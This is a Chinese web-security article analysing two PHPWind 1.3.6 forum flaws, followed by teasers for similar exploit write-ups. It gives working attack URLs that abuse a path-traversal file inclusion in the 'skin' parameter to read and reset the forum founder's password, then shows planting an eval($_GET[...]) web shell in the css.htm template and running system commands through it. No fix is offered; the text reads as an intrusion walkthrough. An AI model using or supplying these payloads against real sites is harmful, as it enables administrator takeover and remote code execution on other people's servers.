PHPWIND1.3.6论坛漏洞分析

所属分类: 网络安全 / 漏洞分析 阅读数: 130
收藏 0 赞 0 分享

  PHPWIND 论坛是一款流行的PHP 论坛,界面美观,功能也比较强大。但大家仔细看一下会发现不论是从界面功能还是代码风格,它和 DISCUZ 都非常相似,具体原因我想也就不用说了,毕竟 DISCUZ 出来比它要早很多。但安全上它没有继承 DISCUZ 的优点, DISCUZ 论坛安全性非常好,而且商家也对此非常重视安全问题,国内论坛中不论从功能还是安全 , 第一非DISCUZ 莫属。PHPWIND 虽然代码严谨,逻辑清楚,但还是有一些漏洞,而且还相当严重。

  一 skin 变量未过滤导致管理员密码更改

  废话少说,我们来分析漏洞。漏洞代码如下 (header.php) :

  !function_exists('readover') && exit('Forbidden');

  if (!$skin) $skin=$db_defaultstyle;

  if(file_exists(R_P."data/style/$skin.php")){

  include_once(R_P."data/style/$skin.php");

  }else{

  include_once(R_P."data/style/wind.php");

  }

  $yeyestyle=='no' ? $i_table="bgcolor=$tablecolor" : $i_table='class=i_table';

  if($groupid=='guest' && $db_regpopup=='1'){

  $head_pop='head_pop';

  } else{

  $head_gotmsg=$winddb['newpm']==1 ? ' 您有新消息 ':' 短消息 ';

  }

  require_once(PrintEot('css'));

  require_once(PrintEot('header'));

  ?>

  其中 $skin 变量是我们提交的,在运行到这里之前,只有一个地方处理过 $skin 变量:

  $_COOKIE['skinco'] && empty($skin) && $skin=$_COOKIE['skinco'];

  语句判断 COOKIE 中是否已经包含 skinco 的信息,如果有了,就取得 COOKIE 中的值,这是处理个人页面风格用的。但如果我们的 COOKIE 中没有这个值 , 那么我们提交的 skin 变量就会一点不变的传到上面的漏洞代码。有人问,如果系统关了 register_globals 会怎么样,关了也没关系。

  if(!ini_get('register_globals') || !get_magic_quotes_gpc()){

  @extract($_POST,EXTR_SKIP);

  @extract($_GET,EXTR_SKIP);

  @extract($_COOKIE,EXTR_SKIP);

  @extract($_FILES,EXTR_SKIP);

  }

  系统在 global.php 中又给释放了。所以我们不管是用 GET 方法或者 POST 方法都可以把构造好的 SKIN 变量传给程序。那传给程序有什么用呢?这是重点!

  我们看这段代码:

  if(file_exists(R_P."data/style/$skin.php")){

  include_once(R_P."data/style/$skin.php");

  }…

  含义是如果( R_P.”data/style/$skin.php” )文件存在就把它包含进来,我也不分析有几种用法了,我直接给出我最简单危害最大的利用方法。

  我们把 skin 的值设为 ”../../admin/manager” ,那就变成了 R_P.”data/style/../../admin/manager.php”, 很显然,这是论坛管理用户的一个程序,存在而且可执行。这个程序是专门用来修改 sql_config.php 的,这里面都是重要数据,包括论坛创始人的用户名和密码。我们只要构造好就可以改它的密码,直接登陆后台管理。在改之前我们可以先查看创始人的用户名。

  我给出查看的方法,大家可以比对论坛程序自己分析一下,我就不在赘述了。

  http://localhost/phpwind/faq.php?skin=../../admin/manager&tplpath=admin

  上面是我机子上的截图,其中 tplpath 变量非常重要,必须是 admin ,它是一个 template 路径,参数不对就不会显示了。

  好我们看了知道了用户名,就可以改它的密码了。

  http://localhost/phpwind/faq.php?skin=../../admin/manager&username=admin&password=xiaohua&check_pwd=xiaohua&action=go

  上面的几个参数的含义大家一看就明白,那个 username 必须添上面看到的用户名,密码自己设,至于为什么要按上面的方法构造,其实很简单 manager.php 需要哪些变量我们就提交哪些变量,不需要的我们不管。上面的变量是它所需要的,所以我们就提交这些变量,注意上面的 action 必须有值。提交后系统什么都不显示,没关系,我们再用第一次的方法就会发现两次密码不一样,证明我们改成功了。如图 2 所示:

  密码改了,我们就可以从管理页面登陆了。

  http://localhost/phpwind/admin.php

  二 后台利用 上传 SHELL

  本来改了管理员密码已经能控制论坛了,但我我觉得不传 SHELL 总觉得事情只做了一半。如何上传 SHELL ,这就要用到后台的功能了。 PHPWIND 不知是想给管理员非常大的权限还是认为没有人有能力进入后台,后台的权利真是大的惊人。其实我们不靠上面的方法,用跨站手段得到管理员密码也不难,不知写论坛的人是怎么想的。

  好,我就随便拣一处危害比较大的地方给大家分析一下,分析一下风格模板设置那个地方。

  点一下左边的连接,右边会显示 /template/wind/css.htm 。

  系统提供的功能简化理解就是可以任意编辑这个 CSS 文件,为论坛的界面做个性化设置,而且论坛运行的时候会 include 这个 css 文件,虽然它的扩展名是 .htm ,但是照样会和其他 PHP 文件一样运行。如果我们能象这个 css.htm 文件写一些 PHP 代码,就相当于我们写一个 SHELL ,是不是很简单。篇幅有限,我直接给出利用方法。把那个右边的 textarea 里面的换成下面的,然后点提交就行了。

  eval($_GET[myphpcode]);

  ?>

  大家最好按上面的构造,当然也可以自己构造,不过上面的方法我做过实验,成功率很高。

  保存之后,用下面的方法就可以利用了。

  http://localhost/phpwind/faq.php?myphpcode=echo%20system(dir);exit ;

  可以运行其它PHP语句,在此不在赘述。

  (本文由责任编辑 pasu 整理发布)

更多精彩内容其他人还在看

DEDECMS任意修改文章漏洞(exp)

  这个漏洞不足以得到马儿 但能修改任何文章 也算是一个严重的漏洞!   废话不说   经典对白 看代码!   membersoft_edit.php   01if(empty($dopost)) //如果这里是空也就是直接访问这个文件   02{   03 //读取归档信息  
收藏 0 赞 0 分享

eWebeditor漏洞的修补

  漏洞原理   漏洞的利用原理很简单,请看Upload.asp文件:   任何情况下都不允许上传asp脚本文件   sAllowExt = Replace(UCase(sAllowExt), "ASP", "")   修补方法:用以下语句
收藏 0 赞 0 分享

发掘MaosinCMS网站系统漏洞与测试

  最近的动易CMS漏洞可以说着实火了一把,本文写的CMS虽然没有动易功能强大,但同样存在注入漏洞。这种漏洞用工具是扫不到的,可以说注入已经由显式转为隐式了,必须查看源代码才有可能发现潜在的漏洞。   适合读者:入侵爱好者前置知识:无发掘MaosinCMS网站系统漏
收藏 0 赞 0 分享

关于bo-blog的安全隐患

  bo-blog是一款外观好看,而且当前流行的个人博客系统,在很多下载站你都可以找到这套程序,而且甚至有很多安全界的人都使用着这套php+txt的程序,但是这套程序里有些安全隐患,可能会被人利用去做一些破坏。   首先开门见山,我们说说它的绝对路径暴露问题.......
收藏 0 赞 0 分享

野草weedcmsV5.2.1 任意删除文件漏洞

  member.php   if($action=='edit_member_ok'){ //member.php?action=edit_member_ok   check_request(); //检查来路   if(!check_login()){ //检测是否登录会员
收藏 0 赞 0 分享

EimsCms v5.0 XSS+CSRF获取Shell方法

  影响版本:EimsCms v5.0   官方网站:http://www.eimscms.com/   漏洞类型:跨站XSS   漏洞描述:未对Book.asp邮箱等处进行符号转义,导致XSS跨站执行漏洞。   ------GetShell-----   [1] 在Book.a
收藏 0 赞 0 分享

动易4.03上传漏洞

  动易4.03上传漏洞。2005-1-10 就出来了,一直没有公布。   看黑客防线的攻关第3关用的是动易所有公布出来了。   影响版本: 动易4.03   上面的是动易的上传代码,从上面分析,我们可以看到,它明显存在着上传漏洞。重要的漏洞代   码在于这一句   FileEx
收藏 0 赞 0 分享

利用%5c绕过验证

  说到%5c,你是不是想起了当前流行的那个%5c暴库漏洞,呵呵,本文就是对%5c利用的探索(呵呵,当然有我提出的新东东,或许对你有帮助哦^_^)。   好,我们先追根溯源,找到那个漏洞的老底。看看绿盟2001年的漏洞公告:_bug&do=view&bug_id=
收藏 0 赞 0 分享

DISCUZ X1.5 本地文件包含漏洞

  DISCUZX1.5 本地文件包含,当然是有条件的,就是使用文件作为缓存。   config_global.php   $_config['cache']['type'] = ‘file’;   function cachedata($cachenam
收藏 0 赞 0 分享

PHP在安全方面的另类应用

  1.远程文件   PHP是一门具有丰富特性的语言,它提供了大量函数,使程序员能够方便地实现各种功能,远程文件就是一个很好的例子:   代码      $fp=@Fopen($url,"r") or die ("cannot open $url&q
收藏 0 赞 0 分享
查看更多